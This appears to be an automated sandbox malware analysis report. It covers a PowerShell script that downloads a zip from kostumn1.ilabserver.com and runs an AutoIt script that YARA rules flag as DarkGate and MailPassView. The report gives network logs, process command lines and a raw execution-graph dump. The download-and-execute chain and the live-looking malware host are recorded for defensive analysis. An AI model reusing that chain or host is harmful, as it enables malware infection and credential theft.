                                    May 27, 2024 18:29:00.286464930 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.286470890 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.286503077 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.286511898 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.287573099 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.287612915 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.287635088 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.287641048 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.287666082 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.287681103 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.288914919 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.288958073 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.288975954 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.288984060 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.289011955 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.289031982 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.354314089 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.354717970 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.354779005 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.354829073 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.354871035 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.354908943 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.354931116 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.355881929 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.355905056 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.355948925 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.355954885 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.355983019 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.355992079 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.371562004 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.371624947 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.371638060 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.371654987 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.371681929 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.371699095 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.373141050 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.373184919 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.373200893 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.373209953 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.373234987 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.373255014 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.374095917 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.374136925 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.374162912 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.374169111 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.374191046 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.374211073 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.374248028 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.374385118 CEST44349730167.235.238.203192.168.2.4
                                    May 27, 2024 18:29:00.374432087 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.397311926 CEST49730443192.168.2.4167.235.238.203
                                    May 27, 2024 18:29:00.546000957 CEST49730443192.168.2.4167.235.238.203
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2024 18:28:58.572530985 CEST | 61959 | 53 | 192.168.2.4 | 1.1.1.1
May 27, 2024 18:28:58.627420902 CEST | 53 | 61959 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 27, 2024 18:28:58.572530985 CEST | 192.168.2.4 | 1.1.1.1 | 0xcae2 | Standard query (0) | kostumn1.ilabserver.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 27, 2024 18:28:58.627420902 CEST | 1.1.1.1 | 192.168.2.4 | 0xcae2 | No error (0) | kostumn1.ilabserver.com | | 167.235.238.203 | A (IP address) | IN (0x0001) | false

• kostumn1.ilabserver.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 167.235.238.203 | 443 | 7276 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-27 16:28:59 UTC | 173 | OUT | GET /1.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: kostumn1.ilabserver.com
Connection: Keep-Alive
2024-05-27 16:28:59 UTC | 276 | IN | HTTP/1.1 200 OK
Date: Mon, 27 May 2024 16:28:59 GMT
Server: Apache
X-Content-Type-Options: nosniff
Last-Modified: Mon, 27 May 2024 11:37:47 GMT
ETag: "c0329-6196df2520363"
Accept-Ranges: bytes
Content-Length: 787241
Connection: close
Content-Type: application/zip

                                    Target ID:0
                                    Start time:12:28:55
                                    Start date:27/05/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oxi.ps1"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:1
                                    Start time:12:28:55
                                    Start date:27/05/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:12:28:56
                                    Start date:27/05/2024
                                    Path:C:\Windows\System32\ipconfig.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                    Imagebase:0x7ff615c30000
                                    File size:35'840 bytes
                                    MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:3
                                    Start time:12:29:00
                                    Start date:27/05/2024
                                    Path:C:\downloads\Autoit3.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\downloads\Autoit3.exe" c:\\downloads\script.a3x
                                    Imagebase:0x800000
                                    File size:893'608 bytes
                                    MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Yara matches:
                                    • Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000003.00000002.1742650595.0000000003919000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000003.00000002.1743157154.0000000003D2E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000002.1742650595.00000000038A8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DarkGate, Description: Yara detected DarkGate, Source: 00000003.00000002.1742451571.000000000379C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 3%, ReversingLabs
                                    • Detection: 4%, Virustotal
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:4
                                    Start time:12:29:01
                                    Start date:27/05/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\kkdbffb\cehaheb
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:12:29:01
                                    Start date:27/05/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:12:29:01
                                    Start date:27/05/2024
                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                    Wow64 process (32bit):true
                                    Commandline:wmic ComputerSystem get domain
                                    Imagebase:0xac0000
                                    File size:427'008 bytes
                                    MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:3.3%
                                      Dynamic/Decrypted Code Coverage:36.9%
                                      Signature Coverage:4.1%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:129
8119e1 141151->141424 141153 814f10 141428 811c9c 141153->141428 141158 811a36 59 API calls 141159 814f34 141158->141159 141435 8039be 141159->141435 141161 814f44 Mailbox 141162 811a36 59 API calls 141161->141162 141163 814f68 141162->141163 141164 8039be 68 API calls 141163->141164 141165 814f77 Mailbox 141164->141165 141166 811207 59 API calls 141165->141166 141167 814f94 141166->141167 141439 8155bc 141167->141439 141171 814fae 141172 850a54 141171->141172 141173 814fb8 141171->141173 141174 8155bc 59 API calls 141172->141174 141175 82312d _W_store_winword 60 API calls 141173->141175 141176 850a68 141174->141176 141177 814fc3 141175->141177 141179 8155bc 59 API calls 141176->141179 141177->141176 141178 814fcd 141177->141178 141180 82312d _W_store_winword 60 API calls 141178->141180 141181 850a84 141179->141181 141182 814fd8 141180->141182 141184 8200cf 61 API calls 141181->141184 141182->141181 141183 814fe2 141182->141183 141185 82312d _W_store_winword 60 API calls 141183->141185 141186 850aa7 141184->141186 141187 814fed 141185->141187 141188 8155bc 59 API calls 141186->141188 141189 814ff7 141187->141189 141190 850ad0 141187->141190 141191 850ab3 141188->141191 141192 81501b 141189->141192 141195 811c9c 59 API calls 141189->141195 141193 8155bc 59 API calls 141190->141193 141194 811c9c 59 API calls 141191->141194 141455 8047be 141192->141455 141196 850aee 141193->141196 141197 850ac1 141194->141197 141198 81500e 141195->141198 141200 811c9c 59 API calls 141196->141200 141201 8155bc 59 API calls 141197->141201 141202 8155bc 59 API calls 141198->141202 141204 850afc 141200->141204 141201->141190 141202->141192 141206 8155bc 59 API calls 141204->141206 141208 850b0b 141206->141208 141208->141208 141210 80477a 59 API calls 141212 815055 141210->141212 141211 8043d0 59 API calls 141211->141212 141212->141210 141212->141211 141213 8155bc 59 API calls 141212->141213 141214 81509b Mailbox 141212->141214 141213->141212 141214->141092 141216 8131cc __write_nolock 
141215->141216 141217 850314 _memset 141216->141217 141218 8131e5 141216->141218 141221 850330 GetOpenFileNameW 141217->141221 141505 820284 141218->141505 141223 85037f 141221->141223 141225 811821 59 API calls 141223->141225 141227 850394 141225->141227 141227->141227 141228 813203 141533 81278a 141228->141533 141343->141099 141375 820fee 141372->141375 141374 821008 141374->141144 141375->141374 141377 82100c std::exception::exception 141375->141377 141382 82593c 141375->141382 141399 8235d1 DecodePointer 141375->141399 141400 8287cb RaiseException 141377->141400 141379 821036 141401 828701 58 API calls _free 141379->141401 141381 821048 141381->141144 141383 8259b7 141382->141383 141393 825948 141382->141393 141408 8235d1 DecodePointer 141383->141408 141385 8259bd 141409 828d58 58 API calls __getptd_noexit 141385->141409 141388 82597b RtlAllocateHeap 141389 8259af 141388->141389 141388->141393 141389->141375 141391 825953 141391->141393 141402 82a39b 58 API calls __NMSG_WRITE 141391->141402 141403 82a3f8 58 API calls 5 library calls 141391->141403 141404 8232cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 141391->141404 141392 8259a3 141406 828d58 58 API calls __getptd_noexit 141392->141406 141393->141388 141393->141391 141393->141392 141397 8259a1 141393->141397 141405 8235d1 DecodePointer 141393->141405 141407 828d58 58 API calls __getptd_noexit 141397->141407 141399->141375 141400->141379 141401->141381 141402->141391 141403->141391 141405->141393 141406->141397 141407->141389 141408->141385 141409->141389 141411 81542d __write_nolock 141410->141411 141412 811821 59 API calls 141411->141412 141416 815590 Mailbox 141411->141416 141414 81545f 141412->141414 141422 815495 Mailbox 141414->141422 141475 811609 141414->141475 141415 815563 141415->141416 141417 811a36 59 API calls 141415->141417 141416->141151 141418 815584 141417->141418 141421 814c94 59 API calls 141418->141421 141419 811a36 59 API calls 141419->141422 141420 811609 59 API 
calls 141420->141422 141421->141416 141422->141415 141422->141416 141422->141419 141422->141420 141478 814c94 141422->141478 141425 8119fb 141424->141425 141427 8119ee 141424->141427 141426 820fe6 Mailbox 59 API calls 141425->141426 141426->141427 141427->141153 141429 811ca7 141428->141429 141430 811caf 141428->141430 141488 811bcc 59 API calls 2 library calls 141429->141488 141432 80477a 141430->141432 141433 820fe6 Mailbox 59 API calls 141432->141433 141434 804787 141433->141434 141434->141158 141436 8039c9 141435->141436 141437 8039f0 141436->141437 141489 803ea3 68 API calls Mailbox 141436->141489 141437->141161 141440 8155c6 141439->141440 141441 8155df 141439->141441 141442 811c9c 59 API calls 141440->141442 141443 811821 59 API calls 141441->141443 141444 814fa0 141442->141444 141443->141444 141445 82312d 141444->141445 141446 823139 141445->141446 141447 8231ae 141445->141447 141454 82315e 141446->141454 141490 828d58 58 API calls __getptd_noexit 141446->141490 141492 8231c0 60 API calls 3 library calls 141447->141492 141450 8231bb 141450->141171 141451 823145 141491 828fe6 9 API calls __wsplitpath_helper 141451->141491 141453 823150 141453->141171 141454->141171 141456 8047c6 141455->141456 141457 820fe6 Mailbox 59 API calls 141456->141457 141458 8047d4 141457->141458 141459 8047e0 141458->141459 141493 8046ec 59 API calls Mailbox 141458->141493 141461 804540 141459->141461 141494 804650 141461->141494 141463 80454f 141464 820fe6 Mailbox 59 API calls 141463->141464 141465 8045eb 141463->141465 141464->141465 141466 8043d0 141465->141466 141467 83d6c9 141466->141467 141472 8043e7 141466->141472 141467->141472 141504 8040cb 59 API calls Mailbox 141467->141504 141469 804530 141503 80523c 59 API calls 141469->141503 141470 8044e8 141473 820fe6 Mailbox 59 API calls 141470->141473 141472->141469 141472->141470 141474 8044ef 141472->141474 141473->141474 141474->141212 141484 811aa4 141475->141484 141477 811614 141477->141414 141479 814ca2 141478->141479 141483 
814cc4 _memmove 141478->141483 141481 820fe6 Mailbox 59 API calls 141479->141481 141480 820fe6 Mailbox 59 API calls 141482 814cd8 141480->141482 141481->141483 141482->141422 141483->141480 141485 811ab7 141484->141485 141487 811ab4 _memmove 141484->141487 141486 820fe6 Mailbox 59 API calls 141485->141486 141486->141487 141487->141477 141488->141430 141489->141437 141490->141451 141491->141453 141492->141450 141493->141459 141495 804659 Mailbox 141494->141495 141496 83d6ec 141495->141496 141501 804663 141495->141501 141497 820fe6 Mailbox 59 API calls 141496->141497 141500 83d6f8 141497->141500 141498 80466a 141498->141463 141500->141500 141501->141498 141502 805190 59 API calls Mailbox 141501->141502 141502->141501 141503->141474 141504->141472 141567 831b70 141505->141567 141508 8202b0 141510 811821 59 API calls 141508->141510 141509 8202cd 141511 8119e1 59 API calls 141509->141511 141512 8202bc 141510->141512 141511->141512 141569 81133d 141512->141569 141515 8209c5 141516 831b70 __write_nolock 141515->141516 141517 8209d2 GetLongPathNameW 141516->141517 141518 811821 59 API calls 141517->141518 141519 8131f7 141518->141519 141520 812f3d 141519->141520 141521 811207 59 API calls 141520->141521 141522 812f4f 141521->141522 141523 820284 60 API calls 141522->141523 141524 812f5a 141523->141524 141525 850177 141524->141525 141526 812f65 141524->141526 141531 850191 141525->141531 141583 81151f 61 API calls 141525->141583 141527 814c94 59 API calls 141526->141527 141529 812f71 141527->141529 141577 801307 141529->141577 141532 812f84 Mailbox 141532->141228 141584 8149c2 141533->141584 141536 84f8d6 141700 869b16 141536->141700 141538 8149c2 136 API calls 141540 8127c3 141538->141540 141540->141536 141543 8127cb 141540->141543 141541 84f908 141545 820fe6 Mailbox 59 API calls 141541->141545 141542 84f8eb 141749 814a2f 141542->141749 141546 8127d7 141543->141546 141547 84f8f3 141543->141547 141564 84f94d Mailbox 141545->141564 141608 8129be 141546->141608 141755 8647e8 
90 API calls _wprintf 141547->141755 141551 84f901 141551->141541 141552 84fb01 141553 822f85 _free 58 API calls 141552->141553 141554 84fb09 141553->141554 141555 814a2f 84 API calls 141554->141555 141560 84fb12 141555->141560 141559 822f85 _free 58 API calls 141559->141560 141560->141559 141561 814a2f 84 API calls 141560->141561 141759 85ff5c 89 API calls 4 library calls 141560->141759 141561->141560 141563 811a36 59 API calls 141563->141564 141564->141552 141564->141560 141564->141563 141735 81343f 141564->141735 141743 813297 141564->141743 141756 85fef8 59 API calls 2 library calls 141564->141756 141757 85fe19 61 API calls 2 library calls 141564->141757 141758 86793a 59 API calls Mailbox 141564->141758 141568 820291 GetFullPathNameW 141567->141568 141568->141508 141568->141509 141570 81134b 141569->141570 141573 811981 141570->141573 141572 81135b 141572->141515 141574 81198f 141573->141574 141576 811998 _memmove 141573->141576 141575 811aa4 59 API calls 141574->141575 141574->141576 141575->141576 141576->141572 141578 801319 141577->141578 141582 801338 _memmove 141577->141582 141580 820fe6 Mailbox 59 API calls 141578->141580 141579 820fe6 Mailbox 59 API calls 141581 80134f 141579->141581 141580->141582 141581->141532 141582->141579 141583->141525 141760 814b29 141584->141760 141589 8149ed LoadLibraryExW 141770 814ade 141589->141770 141590 8508bb 141592 814a2f 84 API calls 141590->141592 141594 8508c2 141592->141594 141596 814ade 3 API calls 141594->141596 141598 8508ca 141596->141598 141597 814a14 141597->141598 141599 814a20 141597->141599 141796 814ab2 141598->141796 141601 814a2f 84 API calls 141599->141601 141603 8127af 141601->141603 141603->141536 141603->141538 141605 8508f1 141804 814a6e 141605->141804 141607 8508fe 141609 84fd14 141608->141609 141610 8129e7 141608->141610 142181 85ff5c 89 API calls 4 library calls 141609->142181 142164 813df7 60 API calls Mailbox 141610->142164 141613 84fd27 142182 85ff5c 89 API calls 4 library calls 141613->142182 
141614 812a09 142165 813e47 67 API calls 141614->142165 141616 812a1e 141616->141613 141617 812a26 141616->141617 141619 811207 59 API calls 141617->141619 141621 812a32 141619->141621 141620 84fd43 141623 812a93 141620->141623 141625 812aa1 141623->141625 141626 84fd56 141623->141626 141701 814a8c 85 API calls 141700->141701 141702 869b85 141701->141702 142193 869cf1 141702->142193 141705 814ab2 74 API calls 141706 869bb4 141705->141706 141707 814ab2 74 API calls 141706->141707 141708 869bc4 141707->141708 141709 814ab2 74 API calls 141708->141709 141710 869bdf 141709->141710 141733 84f8e7 141733->141541 141733->141542 141736 8134df 141735->141736 141740 813452 _memmove 141735->141740 141738 820fe6 Mailbox 59 API calls 141736->141738 141737 820fe6 Mailbox 59 API calls 141739 813459 141737->141739 141738->141740 141740->141737 141744 8132aa 141743->141744 141746 813358 141743->141746 141745 820fe6 Mailbox 59 API calls 141744->141745 141748 8132dc 141744->141748 141745->141748 141746->141564 141748->141746 141750 814a40 141749->141750 141751 814a39 141749->141751 141753 814a60 FreeLibrary 141750->141753 141754 814a4f 141750->141754 142200 8255c6 141751->142200 141753->141754 141754->141547 141755->141551 141756->141564 141757->141564 141758->141564 141759->141560 141809 814b77 141760->141809 141763 814b50 141765 814b60 FreeLibrary 141763->141765 141766 8149d4 141763->141766 141764 814b77 2 API calls 141764->141763 141765->141766 141767 82547b 141766->141767 141813 825490 141767->141813 141769 8149e1 141769->141589 141769->141590 141894 814baa 141770->141894 141773 814b03 141775 814b15 FreeLibrary 141773->141775 141776 814a05 141773->141776 141774 814baa 2 API calls 141774->141773 141775->141776 141777 8148b0 141776->141777 141778 820fe6 Mailbox 59 API calls 141777->141778 141779 8148c5 141778->141779 141898 81433f 141779->141898 141781 8148d1 _memmove 141782 81490c 141781->141782 141783 85080a 141781->141783 141785 814a6e 69 API calls 141782->141785 141784 850817 
141783->141784 141906 869ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 141783->141906 141907 869f5e 95 API calls 141784->141907 141790 814915 141785->141790 141788 814ab2 74 API calls 141788->141790 141789 850859 141901 814a8c 141789->141901 141790->141788 141790->141789 141793 814a8c 85 API calls 141790->141793 141795 8149a0 141790->141795 141793->141790 141794 814ab2 74 API calls 141794->141795 141795->141597 141797 814ac4 141796->141797 141799 850945 141796->141799 142013 825802 141797->142013 141801 8696c4 142138 86951a 141801->142138 141803 8696da 141803->141605 141805 814a7d 141804->141805 141806 850908 141804->141806 142143 825e80 141805->142143 141808 814a85 141808->141607 141810 814b44 141809->141810 141811 814b80 LoadLibraryA 141809->141811 141810->141763 141810->141764 141811->141810 141812 814b91 GetProcAddress 141811->141812 141812->141810 141816 82549c __ioinit 141813->141816 141814 8254af 141862 828d58 58 API calls __getptd_noexit 141814->141862 141816->141814 141818 8254e0 141816->141818 141817 8254b4 141863 828fe6 9 API calls __wsplitpath_helper 141817->141863 141832 830718 141818->141832 141821 8254e5 141822 8254fb 141821->141822 141823 8254ee 141821->141823 141825 825525 141822->141825 141826 825505 141822->141826 141864 828d58 58 API calls __getptd_noexit 141823->141864 141847 830837 141825->141847 141865 828d58 58 API calls __getptd_noexit 141826->141865 141829 8254bf __ioinit @_EH4_CallFilterFunc@8 141829->141769 141833 830724 __ioinit 141832->141833 141834 829e3b __lock 58 API calls 141833->141834 141845 830732 141834->141845 141835 8307ad 141872 828a4d 58 API calls 2 library calls 141835->141872 141836 8307a6 141867 83082e 141836->141867 141839 8307b4 141839->141836 141873 82a05b InitializeCriticalSectionAndSpinCount 141839->141873 141840 830823 __ioinit 141840->141821 141842 829ec3 __mtinitlocknum 58 API calls 141842->141845 141844 8307da EnterCriticalSection 141844->141836 141845->141835 141845->141836 
141845->141842 141870 826e7d 59 API calls __lock 141845->141870 141871 826ee7 LeaveCriticalSection LeaveCriticalSection _doexit 141845->141871 141848 830857 __wopenfile 141847->141848 141849 830871 141848->141849 141861 830a2c 141848->141861 141880 8239fb 60 API calls 2 library calls 141848->141880 141878 828d58 58 API calls __getptd_noexit 141849->141878 141851 830876 141879 828fe6 9 API calls __wsplitpath_helper 141851->141879 141853 830a8f 141875 8387d1 141853->141875 141854 825530 141866 825552 LeaveCriticalSection LeaveCriticalSection __wfsopen 141854->141866 141857 830a25 141857->141861 141881 8239fb 60 API calls 2 library calls 141857->141881 141859 830a44 141859->141861 141882 8239fb 60 API calls 2 library calls 141859->141882 141861->141849 141861->141853 141862->141817 141863->141829 141864->141829 141865->141829 141866->141829 141874 829fa5 LeaveCriticalSection 141867->141874 141869 830835 141869->141840 141870->141845 141871->141845 141872->141839 141873->141844 141874->141869 141883 837fb5 141875->141883 141877 8387ea 141877->141854 141878->141851 141879->141854 141880->141857 141881->141859 141882->141861 141885 837fc1 __ioinit 141883->141885 141884 837fd7 141886 828d58 __wsplitpath_helper 58 API calls 141884->141886 141885->141884 141888 83800d 141885->141888 141887 837fdc 141886->141887 141889 828fe6 __wsplitpath_helper 9 API calls 141887->141889 141890 83807e __wsopen_nolock 109 API calls 141888->141890 141892 837fe6 __ioinit 141889->141892 141891 838029 141890->141891 141893 838052 __wsopen_helper LeaveCriticalSection 141891->141893 141892->141877 141893->141892 141895 814af7 141894->141895 141896 814bb3 LoadLibraryA 141894->141896 141895->141773 141895->141774 141896->141895 141897 814bc4 GetProcAddress 141896->141897 141897->141895 141899 820fe6 Mailbox 59 API calls 141898->141899 141900 814351 141899->141900 141900->141781 141902 814a9b 141901->141902 141905 850923 141901->141905 141908 825a6d 141902->141908 141904 814aa9 141904->141794 
141906->141784 141907->141790 141912 825a79 __ioinit 141908->141912 141909 825a8b 141939 828d58 58 API calls __getptd_noexit 141909->141939 141911 825ab1 141921 826e3e 141911->141921 141912->141909 141912->141911 141913 825a90 141940 828fe6 9 API calls __wsplitpath_helper 141913->141940 141919 825a9b __ioinit 141919->141904 141922 826e70 EnterCriticalSection 141921->141922 141923 826e4e 141921->141923 141925 825ab7 141922->141925 141923->141922 141924 826e56 141923->141924 141926 829e3b __lock 58 API calls 141924->141926 141927 8259de 141925->141927 141926->141925 141928 8259fc 141927->141928 141929 8259ec 141927->141929 141931 825a12 141928->141931 141942 825af0 141928->141942 142012 828d58 58 API calls __getptd_noexit 141929->142012 141971 824c5d 141931->141971 141936 825a53 141984 83185f 141936->141984 141938 8259f1 141941 825ae8 LeaveCriticalSection LeaveCriticalSection __wfsopen 141938->141941 141939->141913 141940->141919 141941->141919 141943 825afd __write_nolock 141942->141943 141944 825b15 141943->141944 141945 825b2d 141943->141945 141946 828d58 __wsplitpath_helper 58 API calls 141944->141946 141947 824906 __fputwc_nolock 58 API calls 141945->141947 141948 825b1a 141946->141948 141949 825b35 141947->141949 141950 828fe6 __wsplitpath_helper 9 API calls 141948->141950 141952 83185f __write 64 API calls 141949->141952 141953 825b51 141952->141953 141972 824c70 141971->141972 141976 824c94 141971->141976 141973 824906 __fputwc_nolock 58 API calls 141972->141973 141972->141976 141974 824c8d 141973->141974 141975 82dab6 __write 78 API calls 141974->141975 141975->141976 141977 824906 141976->141977 141978 824910 141977->141978 141979 824925 141977->141979 141980 828d58 __wsplitpath_helper 58 API calls 141978->141980 141979->141936 142012->141938 142016 82581d 142013->142016 142015 814ad5 142015->141801 142017 825829 __ioinit 142016->142017 142018 82586c 142017->142018 142019 82583f _memset 142017->142019 142028 825864 __ioinit 142017->142028 142020 826e3e 
__lock_file 59 API calls 142018->142020 142043 828d58 58 API calls __getptd_noexit 142019->142043 142022 825872 142020->142022 142029 82563d 142022->142029 142023 825859 142044 828fe6 9 API calls __wsplitpath_helper 142023->142044 142028->142015 142033 825658 _memset 142029->142033 142035 825673 142029->142035 142030 825663 142134 828d58 58 API calls __getptd_noexit 142030->142134 142032 825668 142135 828fe6 9 API calls __wsplitpath_helper 142032->142135 142033->142030 142033->142035 142038 8256b3 142033->142038 142045 8258a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 142035->142045 142037 8257c4 _memset 142137 828d58 58 API calls __getptd_noexit 142037->142137 142038->142035 142038->142037 142039 824906 __fputwc_nolock 58 API calls 142038->142039 142046 83108b 142038->142046 142114 830dd7 142038->142114 142136 830ef8 58 API calls 3 library calls 142038->142136 142039->142038 142043->142023 142044->142028 142045->142028 142047 8310c3 142046->142047 142048 8310ac 142046->142048 142050 8317fb 142047->142050 142054 8310fd 142047->142054 142049 828d24 __write_nolock 58 API calls 142048->142049 142051 8310b1 142049->142051 142052 828d24 __write_nolock 58 API calls 142050->142052 142053 828d58 __wsplitpath_helper 58 API calls 142051->142053 142055 831800 142052->142055 142094 8310b8 142053->142094 142056 831105 142054->142056 142063 83111c 142054->142063 142057 828d58 __wsplitpath_helper 58 API calls 142055->142057 142059 828d24 __write_nolock 58 API calls 142056->142059 142058 831111 142057->142058 142061 828fe6 __wsplitpath_helper 9 API calls 142058->142061 142060 83110a 142059->142060 142066 828d58 __wsplitpath_helper 58 API calls 142060->142066 142061->142094 142062 831131 142064 828d24 __write_nolock 58 API calls 142062->142064 142063->142062 142065 83114b 142063->142065 142067 831169 142063->142067 142063->142094 142064->142060 142065->142062 142071 831156 142065->142071 142066->142058 142068 828a4d __malloc_crt 58 API calls 142067->142068 142069 831179 
